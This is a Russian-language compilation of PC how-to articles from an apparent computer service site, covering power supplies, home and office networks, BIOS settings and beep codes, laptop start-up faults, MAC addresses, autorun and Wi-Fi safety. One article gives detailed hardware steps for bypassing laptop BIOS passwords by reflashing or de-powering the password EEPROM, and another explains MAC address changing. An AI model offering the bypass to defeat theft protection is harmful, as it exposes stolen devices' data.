В кабелях питания персонального компьютера используются стандартизированные разъемы с ключами, предотвращающими неправильное включение. К тому же производители вентиляторов охлаждения часто снабжают свои изделия такими же разъемами, как у кабелей питания дисководов, чтобы при необходимости их можно было легко подключить к питанию 12 вольт. Благодаря проводке с цветовым кодированием и разъемам, соответствующим промышленным стандартам, пользователю предоставляется широкий выбор при замене блока питания.
Управление энергопотреблением с расширенным набором опций
Управление энергопотреблением с расширенным набором опций (advanced Power Management, APM) предусматривает пять различных состояний, в которых может находиться система. Корпорации Microsoft и Intel разработали APM для пользователей персональных компьютеров, желающих экономить электроэнергию. Чтобы использовать эту возможность, каждый из компонентов системы, включая операционную систему, базовую систему ввода-вывода (BIOS), материнскую плату и присоединенные устройства, должен быть APM-совместимым. Если требуется отключить APM в связи с подозрением в чрезмерном расходовании системных ресурсов или в создании конфликтных ситуаций, лучше всего это сделать в BIOS. В таком случае операционная система не будет пытаться повторно установить этот режим, как это иногда происходит в случае его отключения только в программном обеспечении.
Мощность блока питания
400-ваттный импульсный блок питания не обязательно будет потреблять большую мощность, чем 250-ваттный. Более мощный блок питания может потребоваться в случае, если все имеющиеся слоты материнской платы заполнены платами или все отсеки для накопителей в корпусе компьютера заняты дисковыми накопителями. Не следует использовать 250-ваттный блок питания, если суммарная мощность потребления всех устройств компьютера равна 250 ватт, поскольку блок питания нельзя загружать на 100 процентов его номинальной мощности.
Блоки питания одинакового форм-фактора («форм-фактор» относится к фактической конфигурации материнской платы) как правило, отличаются номинальной мощностью и сроком гарантии.
Проблемы, связанные с блоками питания
Блок питания — самый потенциально ненадежный компонент персонального компьютера. Каждый раз во время работы он разогревается и охлаждается, а при каждом включении компьютера испытывает на себе бросок переменного тока. Часто он выходит из строя из-за остановки вентилятора охлаждения и возникшего вследствие этого перегрева компонентов. Все компоненты персонального компьютера питаются постоянным током, поступающим с блока питания.
Обычно при выходе из строя блока питания ощущается запах гари, после чего компьютер выключается. При выходе из строя такого жизненно важного компонента, как охлаждающий вентилятор, и наступившем вследствие этого перегреве компонентов блока питания может возникнуть и другая проблема. Неисправность проявляется в том, что без определенной закономерности происходит перезагрузка системы или без видимой причины происходит сбой ОС Windows.
При решении проблем, причиной которых мог бы быть неисправный блок питания, следует руководствоваться сопроводительной документацией компьютера. Если вы уже снимали кожух своего персонального компьютера, чтобы установить сетевой адаптер или плату оперативной памяти, вам будет нетрудно заменить и блок питания. Сначала нужно в обязательном порядке отсоединить сетевой шнур, поскольку в блоке питания имеется опасное для жизни напряжение даже тогда, когда компьютер выключен.
Модернизация блоков питания
В современных материнских платах и чипсете предусмотрена функция наблюдения за скоростью вращения вентилятора охлаждения блока питания в БИОС и в приложении, работающем под Windows, которое поставляется производителем материнской платы. Многие конструкторы компьютеров предусматривают такое управление вентилятором, что его скорость вращения регулируется в зависимости от потребностей в охлаждении.
Современные веб-серверы комплектуются запасными блоками питания, которые можно заменять в то время, когда вместо них питающее напряжение на аппаратуру поступает от другого блока питания. В некоторых современных компьютерах, в частности в таких, которые предназначены для использования в качестве серверов, имеются резервируемые блоки питания. Это значит, что в системе имеется два или больше блоков питания, один из которых обеспечивает эту систему электропитанием, а другой (другие) находится в резерве. При отказе основного блока питания резервный блок немедленно берет на себя всю нагрузку Затем, пока аппаратура питается от резервного блока питания, можно произвести замену основного блока питания.
Локальные компьютерные сети. Общее понятие

Что же такое локальная компьютерная сеть? Под локальной вычислительной сетью (ЛВС) понимают совместное подключение отдельных компьютеров или рабочих станций к каналу передачи данных. Понятие ЛВС относится к географически ограниченным реализациям, в которых определённое число компьютеров связаны друг с другом с помощью современных и технологичных средств коммуникаций.
ЛВС включает в себя: кабельную локальную сеть, активное сетевое оборудование и компьютеры различного назначения. Преимущества применения локальной вычислительной сети:
— возможность получить и отправить любую информацию с любого компьютера в сети.
— свободное добавление, удаление и перемещение рабочих мест сотрудников внутри офиса/здания.
— оперативное наращивание (модернизация) системы оборудования без затрат на кабельную сеть.
При построении ЛВС главной задачей является грамотное проектирование будущей сети. Благодаря правильно выбранной структуре локальной сети можно существенно повысить скорость и функциональность системы и сократить дальнейшие расходы на её создание и последующий сервис. Хорошо спроектированная и продуманная структурированная локальная сеть позволит в будущем сэкономить Ваши средства и время.
Наша компания выполнит полный комплекс работ по проектированию и монтажу проводной/беспроводной/гибридной локальной компьютерной сети (ЛВС) в вашем офисе; установит и настроит любое активное сетевое оборудование, а так же сервера и рабочие станции. Специалисты нашей компании профессионально осуществляют проектирование, обслуживание и монтаж компьютерных сетей в Санкт-Петербурге.
Домашняя локальная сеть.
Как устроена локальная сеть?
Как построить и настроить домашнюю локальную сеть?
Какие материаллы и оборудование понадобится для организации локальной сети?
Как обеспечить доступ в глобальную сеть интернет со всех компьютеров домашней сети?
Давайте сначала посмотрим на структуру сети, на то, как она устроена и как работает. Для примера рассмотрим простейшую локальную сеть в которую входят два персональных компьютера, один ноутбук и КПК.

В данном случае все компьютеры подключены к маршрутизатору (роутеру), который в свою очередь подключен к интернет-каналу провайдера. Таким образом наш роутер раздаёт интернет-канал всем компьютерам входящим в состав домашней локальной сети. Подключение к роутеру может быть как проводным — посредством специального сетевого кабеля «витая пара» категории UTP-5, так и беспроводным — посредством технологии Wi-Fi. В нашей статье о настройке роутера Planet WRT-414 мы достаточно популярно разъяснили что такое роутер (маршрутизатор) и принцип его работы так же. (Читать статью о настройке роутера в составе домашней сети)
Перед тем, как начать строить домашнюю сеть необходимо составить план сети. Наиболее распространенной схемой построения локальных сетей является вариант «звезда» — как в нашем случае. Если домашняя сеть планируется без выхода в интернет, то вместо роутера достаточно будет использовать свитч или коммутатор. В обоих случаях все компьютеры домашней сети подключаются к роутеру или свитчу. Получается т. н. звезда — роутер или свитч являются как бы центром, а подключенные к нему компьютеры — лучами звезды. Если мы имеем дело с сетью, которая должна быть подключена к свитчу, но провода на всех компьютерах использовать не хочется (или нет возможности), то в этом случае, что бы организовать беспроводную локальную сеть, к свитчу необходимо подключить так называемую Wi-Fi точку доступа. На всех компьютерах входящих в домашнюю сеть должны быть установлены модули Wi-Fi.
Если мы используем маршрутизатор со встроенной точкой доступа, то домашняя сеть организовывается аналогичным образом. Различие лишь в том, что в первом случае все настройки (ip-адрес, маску сети) необходимо настраивать вручную на каждом компьютере, а в случае с маршрутизатором нужно только лишь настроить сам маршрутизатор, а настройку компьютеров домашней сети производить будет не нужно. Роутер сам будет раздавать компьютерам локальной сети все необходимые настройки и обеспечивать доступ в интернет. Для этого в свойствах сетевого подключения на каждом компьютере должно быть установлено «динамическое» получение ip-адресов, в этом случае маршрутизатор выдаст каждому компьютеру в домашней сети уникальный ip-адрес, а так же маску сети, шлюз и DNS-сервер. В опциях маршрутизатора должен быть активирован так называемый DHCP-сервер, то есть специальная программа, которая присваивает всем компьютерам сети различные ip-адреса и другие необходимые настройки. Таким образом любой компьютер или ноутбук (КПК) подключенный к данной сети автоматически получит все нужные настройки от роутера и сможет выходить в интернет.
Если какие-то компьютеры нужно подключить с помощью проводов, то, в этом случае, нам понадобится специальный провод — витая пара категории UTP-5, коннекторы RJ-45, специальные обжимные клещи и несложные навыки.

Клещи для обжима коннекторов RJ-45 на концах кабеля «витая пара»
Кабель «витая пара» UTP-5 и непосредственно сам коннектор RJ-45
Теперь нужно пояснить, что способов обжима витой пары существует два: вариант «А» и вариант «В». Первый вариант используется как раз в нашем случае, а второй — в случае соединения только двух компьютеров напрямую, без свитча или маршрутизатора. На фотографиях ниже приведены оба варианты обжима сетевого кабеля «витая пара». Здесь очень важно соблюдать последовательность цветов — иначе ничего у вас работать не будет.

В первом случае (соединение через свитч или маршрутизатор) имеем вариант А.
Во втором случае вариант В для прямого соединения двух компьютеров.

Сперва очищаем концы кабеля от внешней изоляции примерно на 5 см, затем расплетаем скрутки проводов, после чего выравниваем проводки по цветам в нужной нам последовательности. Откусываем лишние концы проводов клещами, тем самым их выравнивая, и вставляем в коннектор. В нашем случае обжимаем по варианту А:

Вставляем коннектор в обжимные клещи и производим однократный обжим кабеля. Затем аналогичным образом поступаем и с другой стороны.

Ниже приведен способ обжима по варианту «В». Как видно из рисунка — один конец кабеля обжимается по варианту А, а на втором конце провода меняются местами зелёная и оранжевая пары. Таким образом получаем так называемый кросс-кабель для соединения двух компьютеров напрямую.

— Проектирование, монтаж и настройка локальной сети в офисах, установка активного сетевого оборудования.
— Прокладка кабеля UTP-5 и настройка домашней компьютерной сети.
— Установка и настройка роутера (маршрутизатора) для осуществления подключения к одному каналу интернет нескольких компьютеров в составе сети.
— Установка и настройка точки доступа или Wi-Fi маршрутизатора для организации беспроводной локальной сети.
— Настройка сервера для работы в составе корпоративной локальной сети.
Что такое и как работает BIOS. Конфигурирование настроек BIOS
Ранее говорилось о том, что BIOS проверяет наличие клиентских настроек в КМОП. Эти настройки меняются следующим образом. Для того чтобы войти в меню настройки КМОП (BIOS Setup), нужно во время запуска компьютера нажать определенную клавишу или комбинацию клавиш.
В большинстве систем для входа в меню настроек BIOS Setup используются следующие клавиши либо их комбинации: «Esc», «Del», «F1», «F2», «Ctrl-Esc» или «Ctrl-Alt-Esc». Обычно в нижней части экрана появляется строка текста с советом: «Чтобы войти в меню настроек BIOS, нажмите клавишу (*) или комбинацию клавиш (* + *)».
Войдя в меню настроек, можно наблюдать набор текстовых экранов с определенным количеством опций. Некоторые опции стандартные, тогда как другие могут отличаться у разных производителей BIOS. К общепринятым опциям относятся:
— Системное время / дата — установка системного времени и даты
— Последовательность загрузки — очередность устройств, согласно которой BIOS пытается загрузить операционную систему
— Plug and Play («подключи и работай») — стандартная технология автоматического обнаружения вновь подключенных устройств; нужно установить «Yes» («Да»), если компьютер и операционная система ее поддерживают
— Мышь / клавиатура — «Включить фиксацию числового регистра», «Включить клавиатуру», «Автоматическое обнаружение мыши»…
— Конфигурирование дисков — возможность конфигурирования жестких дисков, CD-ROM и дисководов гибких дисков
— Так же в БИОСе можно задать тактовую частоту системной шины (FSB), изменить напряжение питания ядра процессора, оперативной памяти, шины AGP, PCI, PCI-express. Задать тайминги (задержки памяти). Эти настройки являются любимыми у «оверклокеров»
— Память — Указание скопировать BIOS в память по определенному адресу
— Безопасность — Введение пароля доступа к компьютеру или к настройкам БИОС
— Управление электропитанием — Введение управления электропитанием либо отказ от него, а также установка времени для перехода в ждущий и спящий режим
— Выход — Сохранение сделанных изменений, сброс сделанных изменений либо восстановление стандартных настроек
Рассмотрим пункты настроек BIOS на примере Award bios sutup:
Стандартное меню при входе в настройки БИОС содержит порядка 12–14 подпунктов:
— Standard CMOS Features
— Advanced BIOS Features
— Advanced Chipset Features
— Power Magement Features
— PC Health Status
— Set Supervisor Password
— Set User Password
— Load Higt Perfomance Defaults
— Load BIOS Setup Defaults
— Save And Exit Setup
— Exit Without Saving
В самом низу приведены подсказки горячих клавиш для изменения и редактирования параметров БИОС:
F1 — справка (помощь) как правило на английском языке
Esc — выход, отмена
Стрелки влево, вправо, вниз и вверх для навигации по меню и подменю
Клавиши + и — для изменения значений параметров настроек BIOS SetUp
Enter — для входа во вложенные меню
F7 — сброс настроек БИОС на значения по умолчанию
F10 — сохранить сделанные изменения и выйти из BIOS SetUp
Производя изменения в настройках BIOS, следует быть очень осторожным. Неправильные настройки могут привести к тому, что в компьютере не сможет производиться загрузка. Сделав все необходимые настройки BIOS, следует выбрать «Сохранить изменения» и выйти. Как правило это клавиша F10. Чтобы новые настройки начали действовать, BIOS перезагрузит компьютер.
Для сохранения всех изменений, осуществленных пользователем в настройках компьютера, BIOS использует технологию КМОП. Благодаря этой технологии, энергии небольшой литиевой или никель-кадмиевой батареи достаточно для того, чтобы данные могли храниться многие годы. В настоящее время прямо в некоторые самые новые чипы начали встраивать маленькие литиевые батарейки, рассчитанные на 10 лет работы!
Как снять пароль на БИОС в ноутбуке?
BIOS — это базовая система ввода-вывода, то место где хранится пароли, различная служебная информация и конфигурация железа ноутбука.

Сначала, наверное, будет необходимым уточнить, что собственно есть пароль на доступ к настройкам BIOS и пароль на загрузку операционной системы. В первом случае нужно ввести пароль только для входа в настройки самого БИОС, а во втором также и для загрузки ОС. Принцип хранения паролей в ноутбуках, значительно отличается от настольных систем. Такое происходит не всегда, но достаточно часто, потому, что есть модели ноутбуков, у которых снятие пароля на загрузку ОС или на вход в BIOS осуществляется простым сбросом CMOS — извлечением батарейки энергозависимой памяти, но таких моделей единицы, и, как правило, это ноутбуки, сориентированные для домашнего использования. Совершенно другая ситуация с нетбуками и моделями бизнес класса. В них пароль находится отдельно от BIOS в отдельной микросхеме энергонезависимой памяти, и сбросить его так просто не удастся. Само собой такие трудности создаются не просто так. Необходимо это в первую очередь для защиты от краж типа: ноутбук подмышку, быстро домой, сбрасываем CMOS и сливаем конфиденциальную информацию:-) В целях защитить хотя бы информацию и придумывают различные трудности и ухищрения в защите ноутбуков. Но для нас скорее интересно как этот самый пароль снимать.
Вариаций по снятиям пароля достаточно много, в первую очередь, конечно все зависит от конкретной модели ноутбука. К примеру, в старых моделях ноутбуков Toshiba избавлялись от паролей при помощи заглушки на параллельный (LPT) порт, а вот современные — с помощью специального сервисного пароля который завязан на модель и серийный номер ноутбука. Как бы там ни было, чаще всего пароль, а так же кое-какая служебная информация храниться в EPPROM производства фирмы ATMEL серии 24C- (где — цифры), гораздо реже используются 24RF08 и C46C1.
В сервисных центрах по ремонту ноутбуков, как правило, выпаивают эту микросхему EEPROM, устанавливают на программатор, прошивают туда прошивку от такой же модели ноутбука, соответственно уже без пароля, и запаивают её назад, где была. Минус в том, что в EPPROM хранится не только пароль, но и серийный номер ноутбука, PARTNUMBER и кое-какая служебная информация. Естественно, что при таком способе изменится как минимум серийный номер ноутбука. Это НЕ ЕСТЬ ХОРОШО и влечёт за собой потерю гарантии производителя ноутбука. Серийный номер можно и сменить, но для этого нужна программа от производителя ноутбука, которая отсутствует в свободном доступе.
Второй вариант — рассмотреть поподробнее прошивку в софте программатора, найти и поменять там пароль, но и здесь не все гладко, все равно понадобится программатор и паяльник, а, кроме того, пароль хранится в зашифрованном виде, причем односторонним способом, то есть, даже зная алгоритм, обратно его не расшифровать. Но в принципе зная, где конкретно он располагается его можно стереть, не нарушив всей остальной структуры прошивки BIOS.
И, наконец, еще один способ, действует он не на всех ноутбуках, но, к примеру, у того же HP и Dell данную операцию успешно произвести на большей части ноутбуков, зато способ не требует наличия программатора. Для начала необходимо разобрать ноутбук (читать статью о разборке ноутбуков). Иногда полностью демонтировать материнку необходимости нет — достаточно снять верхнюю часть корпуса. Однозначно определить, где именно находится искомая EPPROM, не получится, в 90 % случаев она недалеко от БИОСа или дежурной микросхемы питания, но где именно с какой стороны — это зависит от конкретной модели ноутбука. Это не исключает, что искомый элемент не окажется на оборотной стороне материнской платы или вообще в другой части, например, вообще за южным мостом от дежурки, просто в первую очередь искать нужно именно около микросхемы BIOS и дежурки. Дежурка — дежурная микросхема питания, это большой четырехсторонний контроллер совмещенный с контроллером клавиатуры, чаще всего это 160 или 176 контактный чип производства National Semiconductor обычно маркируемый PC — (где — цифры), например PC87570. Найти его на плате не составит труда, по размерам он похож на южный или северный мост.
Итак, находим нужную EPPROM, на ней есть метка отсчета ножек: либо выемка на одной из сторон, либо точка. Находим ногу питания, отпаиваем ее и приподнимаем. Вообще говоря, мы обесточиваем данную микросхему. После чего нам необходимо запустить ноутбук и зайти в БИОС. Обычно в момент запуска ноутбука он очень долго перебирает память, но в итоге в BIOS зайти удается. Пароль он уже не запрашивает, находясь в БИОСе необходимо прижать отпаянную ногу обратно к контактной площадке, или тонкой отверткой восстановить контакт (обычно это делается стоматологическим крючком) или сразу припаять. Однако паять плохо — может произойти пробой и починить ноутбук будет сложнее, особенно если использовать паяльник с питанием от сети 220 вольт. Ноутбук должен работать и быть загружен в BIOS. С прижатой ногой питания вы проходите в меню безопасность (Security) и пробегаете по всем пунктам, где стоял пароль (User или Supervisor) и подтверждаете, что нет пароля или пишете новый. Дальше сохраняете изменения и перезапускаете ноутбук. Остается только все обесточить, припаять ногу и собрать ноутбук.
Напомним, что на некоторых моделях ноутбуков данный способ не работает, там при обесточивании микросхемы EPPROM ноутбук не инициализируется вообще, то есть даже не доходит до приглашения в BIOS. Правда встречаются ноутбуки которые запускаются вообще без микросхемы EPPROM, но пытаются загрузиться только по сети, не пуская в БИОС.
Автор статьи: Оболкин Алексей («Пионер-Сервис» СЦ обслуживания ноутбуков Samsung)
Ноутбук не включается. Ноутбук включается и сразу выключается
Определяем неисправность. Ремонт ноутбука.
Для начала необходимо уточнить: ноутбук не включается или не загружается операционная система? Как вы понимаете это совершенно две разные вещи. Когда нам звонят и говорят фразу ноутбук не включается это, как правило, может означать что угодно… Однако давайте все же попытаемся определить что подразумевается под фразой ноутбук не включается. Такая фраза в принципе может означать лишь то, что ноутбук не реагирует на нажатие кнопки включения, то есть не загораются индикаторы питания, активности жесткого диска, дисковода ноутбука и не запускается вентилятор системы охлаждения. Иными словами при нажатии кнопки включения не происходит ничего.
В данном случае причин того, что ноутбук не включается может быть достаточно много. Вот наиболее распространённые из них:
1. Неисправен внешний блок питания ноутбука, при этом аккумуляторная батарея разрядилась (села).
2. Сломан разъём питания ноутбука или в нём отсутствует контакт. Неисправен шнур или штекер внешнего блока питания. Батарея также села.
3. Проблема в BIOS материнской платы. Может быть как «битая» прошивка так и её отсутствие. Так же возможна блокировка BIOS из-за непрофессионального вмешательства пользователя в структуру ноутбука.
4. Короткое замыкание в цепях питания на материнской плате. Это обвязка процессора, видеочипа или просто сгорела дежурная микросхема питания, контроллер заряда батареи и т. д.
5. Неисправен центральный процессор или один из мостов на материнской плате.
Следующее «родственное» понятие того, что ноутбук не включается — нет инициализации. Иными словами означает то, что при нажатии кнопки включения ноутбука происходит следующее: начинает крутиться кулер, загораются лампочки индикации, дисплей не включается, отсутствует мигание индикатора активности HDD, загрузка ОС не происходит. Иногда всё это сопровождается звуковыми сигналами системного динамика. Так какие же причины могут быть в этом случае? Вот некоторые из них:
1. Неисправна или вовсе отсутствует оперативная память ноутбука. То же самое бывает при отсутствии центрального процессора или когда он не зафиксирован в сокете (разъёме) при неправильной сборке ноутбука.
2. Вышел из строя или отпаялся северный мост на материнской плате. Такое часто бывает из-за сильного перегрева вследствие забитой пылью системы охлаждения ноутбука.
3. Повреждённая прошивка BIOS или неисправная микросхема EPROM, в которой эта прошивка содержится.
Далее на очереди такой термин как «ноутбук включается, но не загружает ОС». Необходимо отметить, что при этой неисправности, как правило, в большинстве случаев удаётся получить доступ к настройкам BIOS. Такая неисправность может так же означать несколько наиболее распространённых причин:
1. Вышел из строя жёсткий диск (винчестер). Проверяем сначала определяется ли винчестер в BIOS, если да, то опять же смотрим на вкладке последовательности загрузки — с какого устройства разрешена загрузка ОС.
2. Если там всё в порядке, то причина вероятно в том, что либо диск имеет физические повреждения секторов, либо испорчен загрузчик операционной системы. Проверить можно запустив для проверки поверхности винчестера диагностическую программу типа MHDD 4.6, Victoria 3.5 или аналогичные. Если в BIOS жёсткий диск не определяется совсем, то в этом случае возможны собственно два варианта — неисправен сам винчестер или неисправен южный мост на материнской плате, в котором находится контроллер жёсткого диска. Проверяется с помощью подключения заведомо исправного винчестера вместо испытуемого. Если он в BIOS определяется, то меняем винчестер, если снова нет, то несём ноутбук в сервис для замены южного моста.
3. При неисправности загрузчика ОС могут выдаваться сообщения типа “ntldr is missing press Ctrl+Alt+Del to restart” или похожие по смыслу. Лечится такая неисправность переустановкой системы либо восстановлением этого самого загрузчика через консоль восстановления ОС.
4. Как вариант встречаются случаи когда имеет место повреждённая файловая структура жёсткого диска. Но в этом случае ноутбук всё же пытается загрузить ОС, хотя и безрезультатно. Лечится переустановкой ОС или установкой её в режиме восстановления.
Следующий возможный вариант такого рода неисправности это — самопроизвольный перезапуск или выключение ноутбука на стадии инициализации BIOS. Подчеркнём, что ноутбук выключается или перезагружается во время инициализации устройств, а не во время загрузки ОС! Можно сказать, что ноутбук включается и сразу выключается. Или ноутбук включается и выключается через несколько секунд. Нужно понимать, что это различные неисправности. Причин, как всегда, может быть несколько:
По какой то причине не поступает напряжение с внешнего блока питания (см. выше). Ноутбук пытается запуститься от аккумулятора, но поскольку он разряжен, сразу выключается. Перегревается центральный процессор из-за сильно забитой грязью и пылью системы охлаждения ноутбука. Или как вариант — не работает кулер ноутбука. Так же перегрев возможен из-за неправильной сборки системы охлаждения ноутбука, вследствие которой произошло неплотное прилегание радиатора к кристаллу или отсутствие термопасты. Перегрев южного моста вследствие короткого замыкания в нём, как правило, из-за пробоя по шине USB. Не рабочая (повреждённая) прошивка BIOS. Неисправен северный мост ноутбука (произошёл раскол или отслоение кристалла чипа от его подложки)
Как вы понимаете, эти неисправности достаточно сложно диагностировать в домашних условиях к тому же без достаточного опыта и знаний в электронике. Поэтому наш вам добрый совет: если вы понимаете, что поломка вашего ноутбука так или иначе связана с электронной его частью, не пытайтесь самостоятельно его ремонтировать или приглашать «знакомого программиста» для ремонта, потому что это как правило заканчивается тем, что ноутбук восстановлению не подлежит. Лучше сломавшийся ноутбук сразу отнести в сервисный центр специалистам для выявления неисправности и дальнейшего его ремонта.
В заключение данной статьи необходимо отметить, что приведённый выше перечень неисправностей по критерию ноутбук не включается не является полным. В статье приведены лишь только наиболее часто встречающиеся варианты таких неисправностей и, конечно же, многие из них ремонтируются только в сервисном центре.
Похожие симптомы неисправностей ноутбуков: ноутбук не работает от сети, ноутбук не заряжает батарею, ноутбук не работает от батареи АКБ, ноутбук включается но изображения нет, ноутбук при включении пищит, при включении ноутбука мигают лампочки но загрузки не происходит, ноутбук зависает при включении на процедуре POST, ноутбук зависает при входе в BIOS, ноутбук не реагирует на кнопку включения, ноутбук выключается через несколько секунд после включения и т. п.
Как узнать MAC-адрес сетевой карты
Для того, чтобы узнать MAC-адрес сетевой карты нужно выполнить следующие действия:
— Нажимаем пуск > выполнить;

— Вписываем команду cmd > нажимаем OK;

— В командной строке набираем ipconfig/all > нажимаем Enter;

— Находим пункт «физический адрес» — это и есть MAC-адрес (если на вашем компьютере установлено несколько сетевых карт, то пунктов «физический адрес» может быть несколько).

Как узнать MAC-адрес роутера
Для того, чтобы узнать MAC-адрес роутера достаточно просто посмотреть на его нижнюю сторону и найти наклейку с надписью «MAC».

Как поменять MAC-адрес
— Нажимаем правой кнопкой мыши по «Мой компьютер» > «Управление»;

— В меню слева выбираем «Диспетчер устройств»;

— В появившемся списке устройств раскрываем «Сетевые адаптеры» > находим нужную сетевую карту > кликаем правой кнопкой мыши > свойства;

Переходим на вкладку «Дополнительно» > кликаем по «Network Address» > меняем переключатель в положение «Значение» и вписываем новый MAC-адрес;

Знайте! Присвоение чужих MAC-адресов противозаконно.
Как распознать сигналы BIOS
Значения сигналов различаются в зависимости от производителя BIOS. Узнать его вы сможете в документации к материнской плате. Также можно посмотреть производителя BIOS на первой — второй заставках при загрузке компьютера.
И так, вот перечень сигналов BIOS и их значений:
Сигналы Award BIOS
Сигналов нет — неисправен или не подключен к материнской плате блок питания;
— Непрерывный сигнал — неисправен блок питания;
— 1 короткий сигнал — ошибок не обнаружено, компьютер исправен;
— 1 короткий повторяющийся сигнал — проблемы с блоком питания;
— 1 длинный повторяющийся сигнал — неисправность оперативной памяти;
— 2 коротких сигнала — обнаружены незначительные ошибки. Проверьте надежность крепления шлейфов и кабелей в разъемах материнской платы. Установите в BIOS значения по умолчанию;
— 3 длинных сигнала — неисправность контроллера клавиатуры;
— 1 длинный и 1 короткий сигналы — неисправность оперативной памяти;
— 1 длинный и 2 коротких сигнала — неисправность видеокарты;
— 1 длинный и 3 коротких сигнала — неисправность клавиатуры;
— 1 длинный и 9 коротких сигналов — ошибка при чтении данных из микросхемы BIOS.
Сигналы AMI BIOS
— Сигналов нет — неисправен или не подключен к материнской плате блок питания;
— 1 короткий сигнал — ошибок не обнаружено, компьютер исправен;
— 2 коротких сигнала — неисправность оперативной памяти;
— 3 коротких сигнала — ошибка первых 64 Кбайт основной памяти;
— 4 коротких сигнала — неисправность системного таймера;
— 5 коротких сигналов — неисправность центрального процессора;
— 6 коротких сигналов — неисправность контроллера клавиатуры;
— 7 коротких сигналов — неисправность материнской платы;
— 8 коротких сигналов — неисправность ОЗУ видеокарты;
— 9 коротких сигналов — ошибка при проверке контрольной суммы микросхемы BIOS;
— 10 коротких сигналов — невозможно произвести запись в CMOS-память;
— 11 коротких сигналов — неисправность оперативной памяти;
— 1 длинный и 2 коротких сигнала — неисправность видеокарты;
— 1 длинный и 3 коротких сигнала — неисправность видеокарты;
— 1 длинный и 8 коротких сигналов — неисправность видеокарты.
Сигналы Phoenix BIOS
1-1-3. Ошибка записи/чтения данных CMOS;
1-1-4. Ошибка контрольной суммы содержимого микросхемы BIOS;
1-2-1. Неисправна материнская плата;
1-2-2. Ошибка инициализации контроллера DMA;
1-2-3. Ошибка при попытке чтения/записи в один из каналов DMA;
1-3-1. Ошибка регенерации оперативной памяти;
1-3-3. Ошибка при тестировании первых 64 Кб оперативной памяти;
1-3-4. Аналогично предыдущему;
1-4-1. Неисправна материнская плата;
1-4-2. Ошибка тестирования оперативной памяти;
1-4-3. Ошибка системного таймера;
1-4-4. Ошибка обращения к порту ввода/вывода;
2-x-x. Проблемы с первыми 64к памяти (х — от 1 до 4);
3-1-1. Ошибка инициализации второго канала DMA;
3-1-2. Ошибка инициализации первого канала DMA;
3-1-4. Неисправна материнская плата;
3-2-4. Ошибка контроллера клавиатуры;
3-3-4. Ошибка тестирования видеопамяти;
4-2-1. Ошибка системного таймера;
4-2-3. Ошибка линии A20. Неисправен контроллер клавиатуры;
4-2-4. Ошибка при работе в защищенном режиме. Возможно, неисправен центральный процессор;
4-3-1. Ошибка при тестировании оперативной памяти;
4-3-4. Ошибка часов реального времени;
4-4-1. Ошибка тестирования последовательного порта. Может быть вызвана устройством, использующим данный порт;
4-4-2. Ошибка при тестировании параллельного порта. См. выше;
4-4-3. Ошибка при тестировании математического сопроцессора.
Как отключить автозапуск программ
— Через реестр. Для запуска редактора реестра нажимаем «Пуск» — «Выполнить» (в Windows Vista или Windows 7 нажмите комбинацию клавиш win + R) — вписываем команду «regedit» — нажимаем «OK».

В открывшемся окне находим ключи:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run — отвечает за автозагрузку программ всех пользователей.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run — отвечает за автозагрузку программ текущего пользователя.
Для отключения программы из автозагрузки необходимо просто удалить соответствующий параметр. Например, в данном случае будет отключен автозапуск для программы CCleaner:

— В папке «Автозагрузка». Нажимаем «Пуск» — «Все программы» — «Автозагрузка». Все программы, которые находятся в этой папке будут автоматически запускаться при входе в систему. Удалите программу из этой папки, и автозапуск для нее будет отключен;
— Встроенная утилита «msconfig». Для запуска нажимаем «Пуск» — «Выполнить» — команда «msconfig» — «OK»

В открывшейся программе переходим на вкладку «Автозагрузка»

Чтобы отключить программу из автозагрузки, необходимо снять напротив нее галочку и нажать «OK» — затем перезагрузить компьютер;
— Программа Autoruns. В данной статье описаны далеко не все способы автозапуска в Windows. Для получения полного списка компонентов, которые запускаются автоматически можно воспользоваться сторонними программами. На мой взгляд, одна из лучших для этого программа — Autoruns. Она достаточно удобна и интуитивно понятна.
Совет. Из всех перечисленных способов самым безопасным является утилита «msconfig». Внесенные в нее изменения можно вернуть, если обратно поставить галочку напротив выключенного компонента. Самым опасным является реестр. Используйте его только при крайней необходимости.
10 советов по защите Wi-Fi соединений для путешественников
Автор: Michael Kassner
Тема безопасности Wi-Fi соединения в наши дни очень популярна. На ряде форумов, ведутся энергичные дискуссии на предмет «лучшего решения». Один из наиболее часто обсуждаемых аспектов — большое количество параметров, необходимых для защиты при подключении к неизвестным и возможно вредным Wi-Fi сетям.
Учитывая это, я решил взглянуть на проблему безопасности Wi-Fi с точки зрения путешественника. Поскольку представители этой социальной группы часто имеют дело с неизвестными и обычно незащищёнными средамиWi-Fi, то решение, пригодное для них, становится выгодным для всех. Ниже даны 10 советов по обеспечению самого высокого уровня безопасности подключения к неизвестным Wi-Fi сетям.
#1: Выключите адаптер Wi-Fi, если он не используется
Есть две причины. Во-первых, это продлит срок жизни батареи, что очень важно для любого путешественника. Во-вторых, это простейший способ защититься от сетевых атак с использованием процедуры, известной под названием «Microsoft Windows silent ad hoc network advertisement» (Скрытое проникновение в Microsoft Windows с другого компьютера по децентрализованной беспроводной сети). Атакующий пользуется возможность в настройках Microsoft Windows, по умолчанию позволяющей совершать анонимные подключения вида компьютер-компьютер.
#2: Убедитесь, что SSID представляет провайдера данной сети Wi-Fi
Проверка подлинности SSID помогает предотвратить соединение со «злым близнецом». «Злой близнец» появляется после проведения атаки вида «злоумышленник в середине» (man-in-the-middle), когда хакер использует оборудование для подделки идентификатора Wi-Fi сети. Просто и элегантно он заставляет пользователя подключиться к фальшивой сети и начинает обрабатывать каждый байт входящего и исходящего трафика.
#3: Убедитесь, что на ноутбуке запущен программный брандмауэр
Системы Microsoft Windows XP и Vista уже имеют встроенные брандмауэры, но в обоих случаях они неэффективны. Существует множество более подходящих бесплатных аналогов, которые обеспечивают дополнительную защиту, столь необходимую использующим Wi-Fi путешественникам. Я использую Online-Armor, новое приложение, успевшее получить много хвалебных отзывов.
#4: Закройте Общий доступ к файлам и принтерам Windows
По умолчанию функция Общего доступа к файлам и принтерам (File and printer sharing) отключена, но многие пользователи включают её на работе или дома. Во время путешествия эта опция, будучи активированной, только сулит неприятности, так как обеспечивает несанкционированный доступ любому абоненту данной Wi-Fi сети. В статье Базы знаний Microsoft «Disable File and Printer Sharing for Additional Security» (Закрытие общего доступа к файлам и принтерам для обеспечения дополнительной безопасности) представлены рекомендации о том, как определить, включена ли функция Общего доступа к файлам и принтерам, и о том, как её выключить.
#5: Избегайте передачи личной информации при работе в открытых Wi-Fi сетях
